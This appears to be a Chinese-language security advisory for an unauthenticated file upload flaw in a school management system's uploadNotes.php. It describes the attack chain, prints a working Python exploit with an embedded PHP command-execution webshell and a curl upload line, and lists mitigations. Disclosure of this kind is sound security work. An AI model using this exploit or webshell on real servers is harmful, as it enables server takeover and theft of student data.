CVE-2025-11659：ProjectsAndPrograms学校管理系统任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-11659

漏洞类型

任意文件上传（Unrestricted File Upload）

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ProjectsAndPrograms School Management System

漏洞概述

CVE-2025-11659是ProjectsAndPrograms School Management System（学校管理系统）中存在的一个高危安全漏洞，CVSS评分为7.3分。该漏洞位于系统的/assets/uploadNotes.php文件中，攻击者可以通过操纵File参数实现无限制的文件上传操作。由于该漏洞无需认证即可远程利用，且无需用户交互，攻击者可以从网络直接发起攻击，对系统的机密性、完整性和可用性均构成威胁。该漏洞的利用代码已经公开发布，可能被恶意攻击者用于实际攻击活动中。受影响的系统主要用于学校教务管理，涉及学生信息、课程资料、成绩数据等敏感信息，一旦被攻击者利用，可能导致服务器被植入后门、敏感数据泄露或系统被完全控制。该产品的开发采用滚动发布（Rolling Release）模式，持续交付更新，因此官方未提供具体的受影响版本号或修复版本号，用户需要关注官方仓库的最新提交记录以获取安全补丁。此漏洞的发现者为[email protected]，披露日期为2025年10月13日，属于近期披露的高危漏洞，需要相关用户及时采取防护措施。

技术细节

该漏洞的核心问题在于/assets/uploadNotes.php文件对用户上传的文件缺乏充分的验证和过滤机制。具体技术原理如下：

1. **漏洞入口点**：/assets/uploadNotes.php文件是系统用于上传笔记/附件的功能端点，接受用户通过HTTP POST请求上传文件。

2. **参数操控**：漏洞涉及对File参数的处理。攻击者可以通过精心构造的multipart/form-data请求，绕过文件类型检查机制。

3. **绕过方式**：该文件上传功能未对上传文件的扩展名、MIME类型、文件内容进行严格的验证，导致攻击者可以上传任意类型的文件，包括但不限于PHP Webshell、HTML文件（用于钓鱼）、JavaScript文件等可执行脚本。

4. **利用条件**：由于漏洞的攻击向量为网络（AV:N）、攻击复杂度低（AC:L）、无需权限（PR:N）、无需用户交互（UI:N），攻击者只需通过简单的HTTP请求即可完成攻击。

5. **攻击后果**：成功利用后，攻击者可以在服务器上上传并执行恶意PHP代码，进而获取服务器控制权限、读取敏感数据、植入持久化后门，或将服务器作为跳板进行内网渗透。

6. **影响范围**：该漏洞影响机密性（低）、完整性（低）和可用性（低），虽然单项影响评级为低，但综合评分为7.3分，属于高危漏洞，主要因为其易于利用且可远程执行。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎、Shodan等工具识别运行ProjectsAndPrograms School Management System的目标服务器，确认/assets/uploadNotes.php端点存在。

STEP 2

步骤2：构造恶意文件

攻击者准备一个包含PHP Webshell代码的恶意文件，文件扩展名为.php，内容为可执行系统命令的PHP代码。

STEP 3

步骤3：发送上传请求

攻击者通过HTTP POST请求向/assets/uploadNotes.php发送multipart/form-data格式的请求，将恶意PHP文件作为File参数上传。由于服务端缺乏文件类型验证，请求被接受。

STEP 4

步骤4：访问上传的Webshell

攻击者通过浏览器或命令行工具访问上传到服务器上的PHP文件路径（如/assets/shell.php），通过URL参数传入系统命令，获取服务器执行结果。

STEP 5

步骤5：权限提升与持久化

攻击者利用Webshell执行系统命令，收集服务器信息，尝试权限提升，并植入持久化后门，实现对服务器的长期控制。

STEP 6

步骤6：数据窃取与横向移动

攻击者访问数据库读取学生信息、成绩等敏感数据，并以受感染服务器为跳板进行内网横向移动，攻击其他内部系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3 # CVE-2025-11659 - ProjectsAndPrograms School Management System Unrestricted File Upload # Exploit for /assets/uploadNotes.php import requests TARGET_URL = "http://target.com" # Replace with actual target URL UPLOAD_PATH = "/assets/uploadNotes.php" # PHP Webshell payload php_shell = b"""<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $output = shell_exec($_REQUEST['cmd']); echo $output; echo "</pre>"; } ?>""" # Create a PHP file disguised as a note files = { 'File': ('shell.php', php_shell, 'application/x-php') } # Send the malicious upload request url = TARGET_URL + UPLOAD_PATH print(f"[*] Targeting: {url}") try: response = requests.post(url, files=files, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text[:500]}") # Try to access the uploaded shell shell_url = TARGET_URL + "/assets/shell.php?cmd=id" shell_response = requests.get(shell_url, timeout=10) print(f"[*] Shell Status: {shell_response.status_code}") if shell_response.status_code == 200: print(f"[+] Shell accessible at: {shell_url}") print(f"[+] Output: {shell_response.text}") except Exception as e: print(f"[-] Error: {e}") # Alternative: Upload via curl # curl -F "[email protected]" http://target.com/assets/uploadNotes.php

影响范围

ProjectsAndPrograms School Management System (commit 6b6fae5426044f89c08d0dd101c7fa71f9042a59及之前版本)

防御指南

临时缓解措施

在官方发布安全补丁之前，建议采取以下临时缓解措施：1）通过Web服务器配置限制/assets/目录的PHP脚本执行权限；2）部署WAF规则拦截可疑的文件上传请求，特别是包含.php、.jsp、.asp等可执行扩展名的请求；3）监控上传目录的文件变化，及时发现异常文件；4）限制uploadNotes.php的访问，仅允许授权用户访问；5）定期检查服务器日志，识别潜在的恶意上传行为；6）备份重要数据，以便在遭受攻击后能够快速恢复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11659
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11659
3 Details https://www.cvedetails.com/cve/CVE-2025-11659/
4 VulDB https://vuldb.com/cve/CVE-2025-11659
5 Link https://github.com/qqy-123/cve/issues/4
6 Link https://vuldb.com/?ctiid.328076
7 Link https://vuldb.com/?id.328076
8 Link https://vuldb.com/?submit.665609
9 Link https://github.com/qqy-123/cve/issues/4